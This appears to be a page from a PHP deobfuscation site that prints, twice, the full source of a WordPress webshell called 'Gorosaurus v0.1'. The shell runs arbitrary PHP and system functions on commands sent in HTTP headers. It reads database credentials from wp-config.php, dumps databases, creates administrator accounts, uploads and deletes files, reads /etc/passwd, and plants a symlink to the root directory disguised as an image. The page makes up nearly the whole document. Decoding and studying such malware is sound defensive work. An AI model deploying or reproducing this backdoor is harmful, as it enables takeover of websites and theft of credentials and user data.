Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0); /* -={Gorosaurus v0.1: WordPress Webshell}=- -Locate and..
Decoded Output download
<?php
error_reporting(0);
/*
-={Gorosaurus v0.1: WordPress Webshell}=-
-Locate and read WP-CONFIG
-Load wp-config.php (enable direct usage of credentials)
-General WordPress info (files writeables, admins, plugins installed , etc.)
-Knock out security plugins //TODO
-Add admin account
-Backdoor FTP // TODO
-Activate / Deactivate plugins //TODO
-Delete user
-Read db credentials (if is a WordPress)
-Dump WordPress database (shortcut)
-Show all database names
-Show tables and columns from a given database
-Dump databases
-Read a file using load_file //TODO
-Password Protected using HTTP headers
-Commands are sent by unique HTTP headers
-Self-destruction //TODO
-Server info
-Functions allowed
-Eval PHP code
-Execute commands directly as in a terminal-like way (it needs system, passthru or other similar function)
-List all domains in the server
-List all users in the server
-Detect CMS installed in others domains //TODO
-Browse between directories
-List files/directories
-Show source of files
-Download/upload files
-Delete files
-Symlinking
*/
?>
<?php
// FUNCTIONS
function find_file($file) {
/* $file is a file to look for ("wp-config.php" for example).
This function returns a string with the path where is located the file.
If function fails, return "-1".
*/
$found = FALSE;
$start = $file;
$count = 0;
$path = "";
while ($found === FALSE) {
$path = "../".$path;
$test = $path.$start;
if (strlen($test) > 256) { return -1; }
if (file_exists($test)) {
$found = TRUE;
}
$count++;
}
return $test;
}
function read_wp_config() {
/*
Returns: string with the source.
*/
$wp_config = find_file("wp-config.php");
if ($wp_config === -1) {
return -1;
} else {
$source = file_get_contents($wp_config);
return $source;
}
}
function load_wp_config() {
/* include wp-config.php. This allow us to use the credentials directly */
$wp_config = find_file("wp-config.php");
if ($wp_config === -1) {
return -1;
} else {
require($wp_config);
return 1;
}
}
function read_db_data() {
/* $wp_config is wp-config.php source
Returns an array containing user, password, host and db name
*/
@$data = array (DB_NAME, DB_USER, DB_PASSWORD, DB_HOST, DB_PREFIX);
return $data;
}
function dump($db) { //Extracted from Stack Overflow
$link = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD);
mysql_select_db($db,$link);
//get all of the tables
$tables = array();
$result = mysql_query('SHOW TABLES');
while($row = mysql_fetch_row($result))
{
$tables[] = $row[0];
}
//cycle through
foreach($tables as $table)
{
$result = mysql_query('SELECT * FROM '.$table);
$num_fields = mysql_num_fields($result);
$return.= 'DROP TABLE '.$table.';';
$row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
$return.= "
".$row2[1].";
";
for ($i = 0; $i < $num_fields; $i++)
{
while($row = mysql_fetch_row($result))
{
$return.= 'INSERT INTO '.$table.' VALUES(';
for($j=0; $j<$num_fields; $j++)
{
$row[$j] = addslashes($row[$j]);
$row[$j] = ereg_replace("
","\n",$row[$j]);
if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
if ($j<($num_fields-1)) { $return.= ','; }
}
$return.= ");
";
}
}
$return.="
";
}
echo $return;
}
function is_this_allowed($functions) {
/* $functions is an array that contains a list of functions
We return an array with the allowed functions
*/
$allowed = array();
foreach ($functions as $function){
if (function_exists($function)) { $allowed[] = $function; }
}
if (count($allowed) === 0) { return -1; } else { return $allowed; }
}
function server_info() {
echo "[+] Dominio: ".$_SERVER['SERVER_NAME'];
echo "
[+] IP: ".$_SERVER['SERVER_ADDR'];
echo "
[+] OS: ". php_uname("s") . " " . php_uname("r") . " ". php_uname("m");
echo "
[+] Current user: " . get_current_user();
echo "
[+] Safe Mode: ";
if (ini_get("safe_mode")) {
echo "enabled";
}else{
echo "disabled";
}
}
function wordpress_status() {
echo "[+] Akismet is writable: ";
if (is_writable(find_file("/plugins/akismet/akismet.php") === TRUE)) {
echo "Yes";
} else {
echo "No";
}
echo "
[+] Users with admin roles: ";
$users = get_users ('role=administrator');
foreach ($users as $user) {
echo $user->display_name . ", ";
}
echo "
[+] Administrator email: " . get_option('admin_email');
echo "
[+] Plugins installed: ";
$plugins = get_plugins();
foreach ($plugins as $plugin) {
echo "
[+] ". $plugin['Name'] . " - " . $plugin['Version'];
}
}
function terminal($func, $arg) {
echo $func($arg);
}
function browser($string) {
/* Get a base64 encoded string wich contains the args to execute */
$cmd = explode("**", base64_decode($string));
switch($cmd[0]) {
case "pwd":
echo "::". getcwd() ."::";
break;
case "ls":
list_all($cmd[1]);
break;
case "cat":
cat_source($cmd[1]);
break;
case "upload":
upload_file($cmd[1], @$_POST['upload']);
break;
case "delete":
del_file($cmd[1]);
break;
}
}
function list_all($path) {
$dir = opendir($path);
while($it = readdir($dir)) {
if(is_dir($path."/".$it)) {
echo "[DIR] ". perms($path."/".$it) . " ". $it ."
";
} else {
echo "[FILE] ". perms($path."/".$it) . " ". $it ."
";
}
}
}
function cat_source($file) {
$source = file_get_contents($file);
echo "
". $source ."
";
}
function upload_file($file,$source) {
$file = fopen($file, "w");
fwrite($file, base64_decode($source));
}
function del_file($file) {
unlink($file);
}
function add_admin($username, $pass) {
$user_id = wp_create_user($username, $pass);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
function del_user($login) {
$user = get_user_by('login', $login);
$id = $user->ID;
wp_delete_user($id);
}
function perms ($file) { //extracted from PHP.NET
$permisos = fileperms($file);
if (($permisos & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($permisos & 0xA000) == 0xA000) {
// Enlace Simblico
$info = 'l';
} elseif (($permisos & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($permisos & 0x6000) == 0x6000) {
// Especial Bloque
$info = 'b';
} elseif (($permisos & 0x4000) == 0x4000) {
// Directorio
$info = 'd';
} elseif (($permisos & 0x2000) == 0x2000) {
// Especial Carcter
$info = 'c';
} elseif (($permisos & 0x1000) == 0x1000) {
// Tubera FIFO
$info = 'p';
} else {
// Desconocido
$info = 'u';
}
// Propietario
$info .= (($permisos & 0x0100) ? 'r' : '-');
$info .= (($permisos & 0x0080) ? 'w' : '-');
$info .= (($permisos & 0x0040) ?
(($permisos & 0x0800) ? 's' : 'x' ) :
(($permisos & 0x0800) ? 'S' : '-'));
// Grupo
$info .= (($permisos & 0x0020) ? 'r' : '-');
$info .= (($permisos & 0x0010) ? 'w' : '-');
$info .= (($permisos & 0x0008) ?
(($permisos & 0x0400) ? 's' : 'x' ) :
(($permisos & 0x0400) ? 'S' : '-'));
// Mundo
$info .= (($permisos & 0x0004) ? 'r' : '-');
$info .= (($permisos & 0x0002) ? 'w' : '-');
$info .= (($permisos & 0x0001) ?
(($permisos & 0x0200) ? 't' : 'x' ) :
(($permisos & 0x0200) ? 'T' : '-'));
return $info;
}
function sql_query($query, $db) {
/*Recibe como parmetro la query y el elemento del array que debemos de mostrar
Devuelve un array con todos los elementos
*/
$link = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD);
mysql_select_db($db,$link);
$data = array();
$result = mysql_query($query);
while($row = mysql_fetch_row($result))
{
$data[] = $row[0];
}
return $data;
}
function sym_link() {
@mkdir("img");
$check_sym = @symlink("/","img/banner.jpg");
if ($check_sym === TRUE) {
echo "YES";
} else {
echo "NO";
}
}
function server_users() {
$users = @file("/etc/passwd");
$users_clean = array();
if ($users !== FALSE) {
for ($i = 0; $i < count($users); $i++) {
$ask = explode(":", $users[$i]);
$users_clean[] = $ask[0];
}
echo implode("
", $users_clean);
} else {
echo "ERROR-DA_FCK";
}
}
function domain_list() {
$dfile = @file_get_contents("/etc/named.conf");
if ($dfile !== FALSE) {
preg_match_all('/.*?zone "(.*?)"/', $dfile, $domains);
echo implode("
", $domains);
} else { echo "ER#OR"; }
}
function process_headers() {
/* Process HTTP Request Headers from client */
$headers = getallheaders();
$pass_head = "XXX"; //Edit
$exe_head = "YYY"; //Edit
$sql = "ZZZ"; //Edit
if (check_pass($headers[$pass_head]) === 1) {
set_sql_cred($headers[$sql]);
$commands = explode("**",$headers[$exe_head]);
switch(base64_decode($commands[0])) {
case "ping":
ping();
break;
case "db_cred":
$db_cred = read_db_data();
print "[+] DB_NAME: ".$db_cred[0]."
[+] DB_USER: ".$db_cred[1]."
[+] DB_PASSWORD: ".$db_cred[2]."
[+] DB_HOST: ".$db_cred[3]."
[+] TABLE PREFIX: ".$db_cred[4];
break;
case "db_wpdump":
dump(DB_NAME);
break;
case "db_dump":
dump(base64_decode($commands[1]));
break;
case "db_list_databases":
$db_names = sql_query("select schema_name from information_schema.schemata", DB_NAME);
foreach ($db_names as $db_name) {
echo "
[+] ". $db_name;
}
break;
case "db_list_tables":
$table_names = sql_query("select table_name from information_schema.tables where table_schema = '". base64_decode($commands[1])."'", DB_NAME);
foreach ($table_names as $table_name) {
echo "
[+] ". $table_name;
}
break;
case "db_list_columns":
$table_names = sql_query("select column_name from information_schema.columns where table_schema = '". base64_decode($commands[1])."' and table_name = '". base64_decode($commands[2])."'", DB_NAME);
foreach ($table_names as $table_name) {
echo "
[+] ". $table_name;
}
break;
case "server_info":
server_info();
break;
case "allowed":
$check = is_this_allowed(explode(",",base64_decode($commands[1])));
if ( $check === -1) {
echo "[-] All functions are not allowed!";
} else {
echo "[+] Allowed: ". implode(",", $check);
}
break;
case "eval_code":
eval(base64_decode($commands[1]));
break;
case "terminal":
terminal(base64_decode($commands[1]), base64_decode($commands[2]));
break;
case "browse":
browser($commands[1]);
break;
case "wp_status":
wordpress_status();
break;
case "wp_addadmin":
add_admin(base64_decode($commands[1]), base64_encode($commands[2]));
break;
case "wp_delete_user":
del_user(base64_decode($commands[1]));
case "symlink":
sym_link();
case "server_users":
server_users();
case "domain_list":
domain_list();
}
}
}
function check_pass($pass) {
$original = "cartilaginoso";
if ($pass !== $original) {
return -1;
} else {
return 1;
}
}
function ping() {
/* Are we alive? */
echo "alive";
}
function set_sql_cred($raw) {
if (base64_decode($raw) !== "NO" and defined('DB_USER') !== TRUE) {
$cred = explode("**", base64_decode($raw));
define('DB_USER',$cred[0]);
define('DB_PASSWORD',$cred[1]);
define('DB_NAME', $cred[2]);
define('DB_HOST', $cred[3]);
}
}
?>
<?php
//Load wp core files
load_wp_config();
require(find_file("wp-load.php"));
require(find_file("wp-admin/includes/plugin.php"));
require(find_file('wp-includes/registration.php'));
require(find_file('wp-admin/includes/user.php'));
define('DB_PREFIX', @$table_prefix);
process_headers();
?>
Did this file decode correctly?
Original Code
<?php
error_reporting(0);
/*
-={Gorosaurus v0.1: WordPress Webshell}=-
-Locate and read WP-CONFIG
-Load wp-config.php (enable direct usage of credentials)
-General WordPress info (files writeables, admins, plugins installed , etc.)
-Knock out security plugins //TODO
-Add admin account
-Backdoor FTP // TODO
-Activate / Deactivate plugins //TODO
-Delete user
-Read db credentials (if is a WordPress)
-Dump WordPress database (shortcut)
-Show all database names
-Show tables and columns from a given database
-Dump databases
-Read a file using load_file //TODO
-Password Protected using HTTP headers
-Commands are sent by unique HTTP headers
-Self-destruction //TODO
-Server info
-Functions allowed
-Eval PHP code
-Execute commands directly as in a terminal-like way (it needs system, passthru or other similar function)
-List all domains in the server
-List all users in the server
-Detect CMS installed in others domains //TODO
-Browse between directories
-List files/directories
-Show source of files
-Download/upload files
-Delete files
-Symlinking
*/
?>
<?php
// FUNCTIONS
function find_file($file) {
/* $file is a file to look for ("wp-config.php" for example).
This function returns a string with the path where is located the file.
If function fails, return "-1".
*/
$found = FALSE;
$start = $file;
$count = 0;
$path = "";
while ($found === FALSE) {
$path = "../".$path;
$test = $path.$start;
if (strlen($test) > 256) { return -1; }
if (file_exists($test)) {
$found = TRUE;
}
$count++;
}
return $test;
}
function read_wp_config() {
/*
Returns: string with the source.
*/
$wp_config = find_file("wp-config.php");
if ($wp_config === -1) {
return -1;
} else {
$source = file_get_contents($wp_config);
return $source;
}
}
function load_wp_config() {
/* include wp-config.php. This allow us to use the credentials directly */
$wp_config = find_file("wp-config.php");
if ($wp_config === -1) {
return -1;
} else {
require($wp_config);
return 1;
}
}
function read_db_data() {
/* $wp_config is wp-config.php source
Returns an array containing user, password, host and db name
*/
@$data = array (DB_NAME, DB_USER, DB_PASSWORD, DB_HOST, DB_PREFIX);
return $data;
}
function dump($db) { //Extracted from Stack Overflow
$link = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD);
mysql_select_db($db,$link);
//get all of the tables
$tables = array();
$result = mysql_query('SHOW TABLES');
while($row = mysql_fetch_row($result))
{
$tables[] = $row[0];
}
//cycle through
foreach($tables as $table)
{
$result = mysql_query('SELECT * FROM '.$table);
$num_fields = mysql_num_fields($result);
$return.= 'DROP TABLE '.$table.';';
$row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
$return.= "\n\n".$row2[1].";\n\n";
for ($i = 0; $i < $num_fields; $i++)
{
while($row = mysql_fetch_row($result))
{
$return.= 'INSERT INTO '.$table.' VALUES(';
for($j=0; $j<$num_fields; $j++)
{
$row[$j] = addslashes($row[$j]);
$row[$j] = ereg_replace("\n","\\n",$row[$j]);
if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
if ($j<($num_fields-1)) { $return.= ','; }
}
$return.= ");\n";
}
}
$return.="\n\n\n";
}
echo $return;
}
function is_this_allowed($functions) {
/* $functions is an array that contains a list of functions
We return an array with the allowed functions
*/
$allowed = array();
foreach ($functions as $function){
if (function_exists($function)) { $allowed[] = $function; }
}
if (count($allowed) === 0) { return -1; } else { return $allowed; }
}
function server_info() {
echo "[+] Dominio: ".$_SERVER['SERVER_NAME'];
echo "\n[+] IP: ".$_SERVER['SERVER_ADDR'];
echo "\n[+] OS: ". php_uname("s") . " " . php_uname("r") . " ". php_uname("m");
echo "\n[+] Current user: " . get_current_user();
echo "\n[+] Safe Mode: ";
if (ini_get("safe_mode")) {
echo "enabled";
}else{
echo "disabled";
}
}
function wordpress_status() {
echo "[+] Akismet is writable: ";
if (is_writable(find_file("/plugins/akismet/akismet.php") === TRUE)) {
echo "Yes";
} else {
echo "No";
}
echo "\n[+] Users with admin roles: ";
$users = get_users ('role=administrator');
foreach ($users as $user) {
echo $user->display_name . ", ";
}
echo "\n[+] Administrator email: " . get_option('admin_email');
echo "\n[+] Plugins installed: ";
$plugins = get_plugins();
foreach ($plugins as $plugin) {
echo "\n [+] ". $plugin['Name'] . " - " . $plugin['Version'];
}
}
function terminal($func, $arg) {
echo $func($arg);
}
function browser($string) {
/* Get a base64 encoded string wich contains the args to execute */
$cmd = explode("**", base64_decode($string));
switch($cmd[0]) {
case "pwd":
echo "::". getcwd() ."::";
break;
case "ls":
list_all($cmd[1]);
break;
case "cat":
cat_source($cmd[1]);
break;
case "upload":
upload_file($cmd[1], @$_POST['upload']);
break;
case "delete":
del_file($cmd[1]);
break;
}
}
function list_all($path) {
$dir = opendir($path);
while($it = readdir($dir)) {
if(is_dir($path."/".$it)) {
echo "[DIR] ". perms($path."/".$it) . " ". $it ."\n";
} else {
echo "[FILE] ". perms($path."/".$it) . " ". $it ."\n";
}
}
}
function cat_source($file) {
$source = file_get_contents($file);
echo "\n\n". $source ."\n\n";
}
function upload_file($file,$source) {
$file = fopen($file, "w");
fwrite($file, base64_decode($source));
}
function del_file($file) {
unlink($file);
}
function add_admin($username, $pass) {
$user_id = wp_create_user($username, $pass);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
function del_user($login) {
$user = get_user_by('login', $login);
$id = $user->ID;
wp_delete_user($id);
}
function perms ($file) { //extracted from PHP.NET
$permisos = fileperms($file);
if (($permisos & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($permisos & 0xA000) == 0xA000) {
// Enlace Simblico
$info = 'l';
} elseif (($permisos & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($permisos & 0x6000) == 0x6000) {
// Especial Bloque
$info = 'b';
} elseif (($permisos & 0x4000) == 0x4000) {
// Directorio
$info = 'd';
} elseif (($permisos & 0x2000) == 0x2000) {
// Especial Carcter
$info = 'c';
} elseif (($permisos & 0x1000) == 0x1000) {
// Tubera FIFO
$info = 'p';
} else {
// Desconocido
$info = 'u';
}
// Propietario
$info .= (($permisos & 0x0100) ? 'r' : '-');
$info .= (($permisos & 0x0080) ? 'w' : '-');
$info .= (($permisos & 0x0040) ?
(($permisos & 0x0800) ? 's' : 'x' ) :
(($permisos & 0x0800) ? 'S' : '-'));
// Grupo
$info .= (($permisos & 0x0020) ? 'r' : '-');
$info .= (($permisos & 0x0010) ? 'w' : '-');
$info .= (($permisos & 0x0008) ?
(($permisos & 0x0400) ? 's' : 'x' ) :
(($permisos & 0x0400) ? 'S' : '-'));
// Mundo
$info .= (($permisos & 0x0004) ? 'r' : '-');
$info .= (($permisos & 0x0002) ? 'w' : '-');
$info .= (($permisos & 0x0001) ?
(($permisos & 0x0200) ? 't' : 'x' ) :
(($permisos & 0x0200) ? 'T' : '-'));
return $info;
}
function sql_query($query, $db) {
/*Recibe como parmetro la query y el elemento del array que debemos de mostrar
Devuelve un array con todos los elementos
*/
$link = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD);
mysql_select_db($db,$link);
$data = array();
$result = mysql_query($query);
while($row = mysql_fetch_row($result))
{
$data[] = $row[0];
}
return $data;
}
function sym_link() {
@mkdir("img");
$check_sym = @symlink("/","img/banner.jpg");
if ($check_sym === TRUE) {
echo "YES";
} else {
echo "NO";
}
}
function server_users() {
$users = @file("/etc/passwd");
$users_clean = array();
if ($users !== FALSE) {
for ($i = 0; $i < count($users); $i++) {
$ask = explode(":", $users[$i]);
$users_clean[] = $ask[0];
}
echo implode("\n", $users_clean);
} else {
echo "ERROR-DA_FCK";
}
}
function domain_list() {
$dfile = @file_get_contents("/etc/named.conf");
if ($dfile !== FALSE) {
preg_match_all('/.*?zone "(.*?)"/', $dfile, $domains);
echo implode("\n", $domains);
} else { echo "ER#OR"; }
}
function process_headers() {
/* Process HTTP Request Headers from client */
$headers = getallheaders();
$pass_head = "XXX"; //Edit
$exe_head = "YYY"; //Edit
$sql = "ZZZ"; //Edit
if (check_pass($headers[$pass_head]) === 1) {
set_sql_cred($headers[$sql]);
$commands = explode("**",$headers[$exe_head]);
switch(base64_decode($commands[0])) {
case "ping":
ping();
break;
case "db_cred":
$db_cred = read_db_data();
print "[+] DB_NAME: ".$db_cred[0]."\n[+] DB_USER: ".$db_cred[1]."\n[+] DB_PASSWORD: ".$db_cred[2]."\n[+] DB_HOST: ".$db_cred[3]."\n[+] TABLE PREFIX: ".$db_cred[4];
break;
case "db_wpdump":
dump(DB_NAME);
break;
case "db_dump":
dump(base64_decode($commands[1]));
break;
case "db_list_databases":
$db_names = sql_query("select schema_name from information_schema.schemata", DB_NAME);
foreach ($db_names as $db_name) {
echo "\n[+] ". $db_name;
}
break;
case "db_list_tables":
$table_names = sql_query("select table_name from information_schema.tables where table_schema = '". base64_decode($commands[1])."'", DB_NAME);
foreach ($table_names as $table_name) {
echo "\n[+] ". $table_name;
}
break;
case "db_list_columns":
$table_names = sql_query("select column_name from information_schema.columns where table_schema = '". base64_decode($commands[1])."' and table_name = '". base64_decode($commands[2])."'", DB_NAME);
foreach ($table_names as $table_name) {
echo "\n[+] ". $table_name;
}
break;
case "server_info":
server_info();
break;
case "allowed":
$check = is_this_allowed(explode(",",base64_decode($commands[1])));
if ( $check === -1) {
echo "[-] All functions are not allowed!";
} else {
echo "[+] Allowed: ". implode(",", $check);
}
break;
case "eval_code":
eval(base64_decode($commands[1]));
break;
case "terminal":
terminal(base64_decode($commands[1]), base64_decode($commands[2]));
break;
case "browse":
browser($commands[1]);
break;
case "wp_status":
wordpress_status();
break;
case "wp_addadmin":
add_admin(base64_decode($commands[1]), base64_encode($commands[2]));
break;
case "wp_delete_user":
del_user(base64_decode($commands[1]));
case "symlink":
sym_link();
case "server_users":
server_users();
case "domain_list":
domain_list();
}
}
}
function check_pass($pass) {
$original = "cartilaginoso";
if ($pass !== $original) {
return -1;
} else {
return 1;
}
}
function ping() {
/* Are we alive? */
echo "alive";
}
function set_sql_cred($raw) {
if (base64_decode($raw) !== "NO" and defined('DB_USER') !== TRUE) {
$cred = explode("**", base64_decode($raw));
define('DB_USER',$cred[0]);
define('DB_PASSWORD',$cred[1]);
define('DB_NAME', $cred[2]);
define('DB_HOST', $cred[3]);
}
}
?>
<?php
//Load wp core files
load_wp_config();
require(find_file("wp-load.php"));
require(find_file("wp-admin/includes/plugin.php"));
require(find_file('wp-includes/registration.php'));
require(find_file('wp-admin/includes/user.php'));
define('DB_PREFIX', @$table_prefix);
process_headers();
?>
Function Calls
find_file | 1 |
load_wp_config | 1 |
error_reporting | 1 |
Stats
MD5 | ffe488e990e44612d168901ebd8324ee |
Eval Count | 0 |
Decode Time | 172 ms |